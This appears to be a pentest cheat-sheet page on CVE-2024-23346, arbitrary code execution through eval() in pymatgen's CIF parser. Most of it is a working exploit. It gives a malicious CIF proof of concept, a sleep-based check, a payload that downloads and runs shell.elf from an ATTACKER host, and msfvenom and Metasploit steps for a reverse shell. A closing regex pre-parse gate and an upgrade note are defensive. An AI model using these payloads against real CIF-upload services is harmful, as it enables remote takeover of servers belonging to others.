# Pymatgen CIF Parser

Pymatgen (Python Materials Genomics) is a Python library for materials analysis. In versions before 2024.2.20, its CIF (Crystallographic Information File) parser handed the magnetic space-group transformation string (`_space_group_magn.transform_BNS_Pp_abc`) to `eval()`, so a crafted CIF file achieves arbitrary code execution (CVE-2024-23346).

## GHSA-vgv8-5cpj-qj2f - Arbitrary Code Execution

**Vulnerable Code Pattern:**

```python
from pymatgen.io.cif import CifParser
# Parsing user-uploaded .cif files
```

**Indicators:**

* Web app accepting `.cif` file uploads
* Flask/Python app with CIF analysis features
* "Crystallographic Information File" mentioned

### Exploitation

**Malicious CIF File (RCE POC):**

```
data_5yOhtAoR
_audit_creation_date            2018-06-08
_audit_creation_method          "Pymatgen CIF Parser Arbitrary Code Execution Exploit"

loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("id");0,0,0'


_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "
```

**Verify with sleep:**

Replace the command with `sleep 10` and observe the delay in the response:

```
_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("sleep 10");0,0,0'
```

**Download and execute reverse shell:**

```
_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("curl http://ATTACKER:8000/shell.elf -o /tmp/shell.elf && chmod +x /tmp/shell.elf && /tmp/shell.elf");0,0,0'
```

### Attack Steps

```bash
# 1. Generate payload
msfvenom -p linux/x64/shell/reverse_tcp LHOST=ATTACKER_IP LPORT=9001 -f elf -o shell.elf

# 2. Host payload
python3 -m http.server 8000

# 3. Start listener (use metasploit for staged payload)
msfconsole
use multi/handler
set payload linux/x64/shell/reverse_tcp
set LHOST ATTACKER_IP
set LPORT 9001
run -j

# 4. Upload malicious .cif file to target app
# 5. Trigger parsing (usually by viewing the uploaded file)
```
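A defensive counterpart, added here as an example rather than taken from pymatgen or the original write-up: a pre-parse gate that rejects any `_space_group_magn.transform_BNS_Pp_abc` value outside the strict Jones-faithful grammar (`a,b,c;0,0,0`-style tokens) before the file reaches `CifParser`. The sample CIF texts are constructed, and only single-line values are handled (an assumption stated in the code).

```python
import re

# Field that vulnerable pymatgen releases (before 2024.2.20) fed to eval().
TRANSFORM_KEY = "_space_group_magn.transform_BNS_Pp_abc"

# A legitimate Jones-faithful string is e.g. "a,b,c;0,0,0" or
# "-a+b,c,2a;1/2,0,0": lattice letters, digits, + - * /, commas, whitespace
# and an optional ';' translation part. Dots, brackets, underscores,
# quotes or parentheses never belong in this field.
SAFE_TRANSFORM = re.compile(r"^[abc0-9+\-*/\s,]+(;[0-9+\-*/\s,]+)?$")


def is_safe_transform(value: str) -> bool:
    """True if value matches the strict transformation grammar."""
    return SAFE_TRANSFORM.fullmatch(value.strip()) is not None


def _unquote(raw: str) -> str:
    """Strip surrounding CIF single or double quotes from a value."""
    raw = raw.strip()
    if len(raw) >= 2 and raw[0] == raw[-1] and raw[0] in "'\"":
        return raw[1:-1]
    return raw


def find_unsafe_transforms(cif_text: str) -> list[str]:
    """Return every TRANSFORM_KEY value that fails the grammar.

    Assumption: the value sits on the same line as the tag (CIF text fields
    delimited by ';' at line start are not handled), which is enough for a
    gate that runs before the real parser.
    """
    bad = []
    for line in cif_text.splitlines():
        stripped = line.strip()
        if not stripped.lower().startswith(TRANSFORM_KEY.lower()):
            continue
        value = _unquote(stripped[len(TRANSFORM_KEY):])
        if not is_safe_transform(value):
            bad.append(value)
    return bad


def safe_to_parse(cif_text: str) -> bool:
    """Call before handing an uploaded CIF to CifParser."""
    return not find_unsafe_transforms(cif_text)


# Constructed sample inputs, not real uploads.
BENIGN_CIF = "data_test\n_space_group_magn.number_BNS  62.448\n" \
             "_space_group_magn.transform_BNS_Pp_abc  'a,b,c;0,0,0'\n"
# Attribute access inside the field is the hallmark of the injection above.
SUSPICIOUS_CIF = "data_test\n" \
                 "_space_group_magn.transform_BNS_Pp_abc  'a,b,().__class__;0,0,0'\n"
```

Upgrading pymatgen to a fixed release remains the actual remedy; the gate only buys time for deployments that cannot upgrade immediately.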

### References

* <https://github.com/advisories/GHSA-vgv8-5cpj-qj2f>
* <https://nvd.nist.gov/vuln/detail/CVE-2024-23346>

